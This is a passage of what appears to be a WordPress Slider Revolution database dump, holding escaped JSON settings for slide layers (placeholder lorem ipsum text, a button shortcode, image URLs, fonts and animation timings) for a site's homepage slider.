,\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"45px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"15\":{\"text\":\"Lorem ipsum dolor sit amet, in doctus voluptua mei. At sit nibh audire, eu qui legere alienum, ea vel exerci consul aperiam. Percipit adversarium per in justo nonumes.\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":15,\"size\":{\"width\":{\"d\":{\"v\":\"575px\",\"e\":true},\"n\":{\"v\":\"526px\",\"e\":true},\"t\":{\"v\":\"539px\",\"e\":true},\"m\":{\"v\":\"539px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"69px\",\"e\":true},\"t\":{\"v\":\"69px\",\"e\":true},\"m\":{\"v\":\"69px\"}},\"originalWidth\":\"575px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-333px\",\"e\":true},\"n\":{\"v\":\"-235px\",\"e\":true},\"t\":{\"v\":\"-26px\",\"e\":true},\"m\":{\"v\":\"-26px\"}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"45px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"198px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":16,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":620},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\"},\"25\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"Button\",\"uid\":25,\"size\":{\"width\":{\"d\":{\"v\":\"506px\",\"e\":true},\"n\":{\"v\":\"506px\",\"e\":true},\"t\":{\"v\":\"506px\",\"e\":true},\"m\":{\"v\":\"506px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"506px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-367px\",\"e\":true},\"n\":{\"v\":\"-243px\",\"e\":true},\"t\":{\"v\":\"-42px\",\"e\":true},\"m\":{\"v\":\"169px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"114px\",\"e\":true},\"n\":{\"v\":\"152px\",\"e\":true},\"t\":{\"v\":\"281px\",\"e\":true},\"m\":{\"v\":\"148px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":17,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"hor_lines\":[\"149px\"],\"version\":\"6.1.6\"}'),(9,4,2,'{\"title\":\"second\",\"bg\":{\"type\":\"solid\",\"color\":\"#eff0ea\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"02\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"6\":{\"text\":\"Image 6\",\"alias\":\"Flaster\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic2-1.png\",\"imageId\":3266},\"size\":{\"width\":{\"d\":{\"v\":\"418px\",\"e\":true},\"n\":{\"v\":\"305px\",\"e\":true},\"t\":{\"v\":\"305px\"},\"m\":{\"v\":\"221px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"129px\",\"e\":true},\"n\":{\"v\":\"94px\",\"e\":true},\"t\":{\"v\":\"94px\"},\"m\":{\"v\":\"68px\",\"e\":true}},\"originalWidth\":418,\"originalHeight\":129,\"aspectRatio\":{\"d\":{\"v\":3.240310077519379827748480238369666039943695068359375},\"n\":{\"v\":3.240310077519379827748480238369666039943695068359375},\"t\":{\"v\":3.240310077519379827748480238369666039943695068359375},\"m\":{\"v\":3.240310077519379827748480238369666039943695068359375}}},\"position\":{\"x\":{\"d\":{\"v\":\"182px\",\"e\":true},\"n\":{\"v\":\"133px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"-23px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"250px\",\"e\":true},\"n\":{\"v\":\"205px\",\"e\":true},\"t\":{\"v\":\"209px\",\"e\":true},\"m\":{\"v\":\"108px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":670},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"reverseDirection\":{\"rotationY\":true},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1390,\"start\":670,\"startRelative\":670},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1390,\"start\":670,\"startRelative\":670},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":940,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"1\":{\"text\":\"Image 1\",\"alias\":\"Bocica\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic1-1.png\",\"imageId\":3261},\"size\":{\"width\":{\"d\":{\"v\":\"912px\",\"e\":true},\"n\":{\"v\":\"560px\",\"e\":true},\"t\":{\"v\":\"560px\"},\"m\":{\"v\":\"419px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"718px\",\"e\":true},\"n\":{\"v\":\"441px\",\"e\":true},\"t\":{\"v\":\"441px\"},\"m\":{\"v\":\"330px\",\"e\":true}},\"originalWidth\":912,\"originalHeight\":718,\"aspectRatio\":{\"d\":{\"v\":1.270194986072423315448531866422854363918304443359375},\"n\":{\"v\":1.270194986072423315448531866422854363918304443359375},\"t\":{\"v\":1.270194986072423315448531866422854363918304443359375},\"m\":{\"v\":1.270194986072423315448531866422854363918304443359375}}},\"position\":{\"x\":{\"d\":{\"v\":\"572px\",\"e\":true},\"n\":{\"v\":\"369px\",\"e\":true},\"t\":{\"v\":\"200px\",\"e\":true},\"m\":{\"v\":\"149px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"34px\",\"e\":true},\"n\":{\"v\":\"60px\",\"e\":true},\"t\":{\"v\":\"84px\",\"e\":true},\"m\":{\"v\":\"35px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":690},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1400,\"start\":690,\"startRelative\":690},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1400,\"start\":690,\"startRelative\":690},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":910,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",